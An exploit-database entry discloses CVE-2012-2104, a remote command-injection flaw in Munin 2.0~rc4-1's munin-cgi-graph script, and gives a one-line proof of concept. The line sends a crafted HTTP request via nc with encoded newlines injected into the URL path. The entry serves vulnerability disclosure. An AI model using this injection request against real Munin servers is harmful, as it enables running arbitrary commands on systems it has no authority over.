Munin 2.0~rc4-1 - Remote Command Injection

Author: Helmut Grohne
type: webapps
platform: cgi
port: 
date_added: 2012-04-13 
date_updated: 2015-05-22 
verified: 1 
codes: CVE-2012-2104;OSVDB-85156 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/53032/info

Munin is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.

printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80